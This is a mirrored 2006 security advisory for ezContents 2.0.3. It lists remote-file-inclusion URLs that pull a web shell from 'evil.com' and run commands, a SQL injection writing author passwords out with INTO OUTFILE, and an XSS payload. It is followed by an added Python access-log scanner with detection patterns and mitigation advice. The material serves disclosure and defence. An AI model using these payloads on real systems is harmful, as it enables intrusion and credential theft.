[EN] securityvulns.ru

From: gmdarkfig_(at)_gmail.com <gmdarkfig_(at)_gmail.com>
Date: 31.08.2006
Subject: ezContents Version 2.0.3 Remote/Local File Inclusion, SQL Injection, XSS

#
# VulnScr: ezContents Version 2.0.3
# Web....: http://www.ezcontents.org/
#
# Date...: Web July 28 10:44 2006
# Credits: DarkFig (gmdarkfig@gmail.com)
# Vuln...: SQL Injection, Remote/Local File Inclusion, Cross Site Scripting
#

==[ Remote / Local File Inclusion
=================================
http://[...]/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/calendar/calendar.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/gallery/gallery_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/guestbook/showguestbook.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/links/showlinks.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/news/shownews.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/poll/showpoll.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/reviews/review_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/search/search.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/toprated/toprated.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/whatsnew/whatsnew.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls

==[ SQL Injection
=================
http://[...]/headeruserdata.php?groupname=' UNION SELECT userpassword FROM authors INTO OUTFILE '/www/passwd.txt' #


==[ Cross Site Scripting
========================
http://[...]/loginreq2.php?subgroupname="><script>alert(666)</script>
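Each of the three request shapes in this advisory leaves a recognisable trace in the web server's access log, which is what a defender reviewing an ezContents 2.0.3 deployment would look for first. The script below is an added example, not part of DarkFig's advisory and not ezContents code: it parses a few constructed Apache combined-format log lines and tags requests that carry a `GLOBALS[...]` overwrite in the query string, a stream-wrapper URL (such as `ftps://`) in such a parameter, a `UNION SELECT` / `INTO OUTFILE` string, or a `<script` tag. The client addresses, the `evil.example` host and the log lines themselves are constructed placeholders; the paths and parameter names are those the advisory reports.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in Apache combined log format. Client addresses and
# the host in the include URL are placeholders; the query strings reproduce the
# three request shapes the advisory reports against ezContents 2.0.3.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Aug/2006:10:44:01 +0000] "GET /modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.example/sh.php&cmd=ls HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [31/Aug/2006:10:44:02 +0000] "GET /headeruserdata.php?groupname=%27%20UNION%20SELECT%20userpassword%20FROM%20authors%20INTO%20OUTFILE%20%27/www/passwd.txt%27%20%23 HTTP/1.1" 200 77 "-" "Mozilla/5.0"
203.0.113.7 - - [31/Aug/2006:10:44:03 +0000] "GET /loginreq2.php?subgroupname=%22%3E%3Cscript%3Ealert(666)%3C/script%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.2 - - [31/Aug/2006:10:45:00 +0000] "GET /modules/news/shownews.php?id=12 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Client address and the quoted request line of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"'
)

# Any stream-wrapper scheme (http, ftp, ftps, php, data, ...) at the start of a value.
REMOTE_SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)
# UNION-based selects and MySQL file writes, the shape of the advisory's injection string.
SQLI_RE = re.compile(r'\bUNION\b(?:\s+ALL)?\s+SELECT\b|\bINTO\s+OUTFILE\b', re.IGNORECASE)
# Script-tag injection in a reflected parameter.
XSS_RE = re.compile(r'<\s*script\b', re.IGNORECASE)


def parse_request(line):
    """Return (client, path, query) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Split on the first '?' ourselves rather than via urlsplit, so a raw '#'
    # in the query is not dropped as a fragment.
    path, _, query = m.group("target").partition("?")
    return m.group("client"), path, query


def classify_query(query):
    """Tag one raw query string with the attack classes it matches."""
    tags = set()
    # keep_blank_values keeps pairs such as GLOBALS[rootdp]= whose value is empty.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.startswith("GLOBALS["):
            # A request parameter named GLOBALS[...] is the shape of the
            # register_globals-era overwrite of PHP's $GLOBALS array.
            tags.add("globals_overwrite")
            if REMOTE_SCHEME_RE.match(value):
                tags.add("remote_include")
        if SQLI_RE.search(value):
            tags.add("sql_injection")
        if XSS_RE.search(value):
            tags.add("xss")
    return tags


def scan_log(text):
    """Scan a block of log text; return one finding per request that matches."""
    findings = []
    for line in text.splitlines():
        parsed = parse_request(line)
        if parsed is None:
            continue
        client, path, query = parsed
        tags = classify_query(query)
        if tags:
            findings.append({"client": client, "path": path, "tags": tags})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['path']} {' '.join(sorted(f['tags']))}")
```

Run directly, it prints one line per flagged request and skips the benign `shownews.php?id=12` hit. The `GLOBALS[` key is the part worth alerting on independently of the path list: on a PHP version and configuration where the `$GLOBALS` overwrite is possible, every variable that an ezContents module splices into an `include` is reachable this way, so a new path in the same shape is the same bug. On the mitigation side, turning off `register_globals` and `allow_url_fopen` / `allow_url_include` removes the remote-include vector, while the `groupname` and `subgroupname` parameters still need to be parameterised in the query and escaped on output respectively.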

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod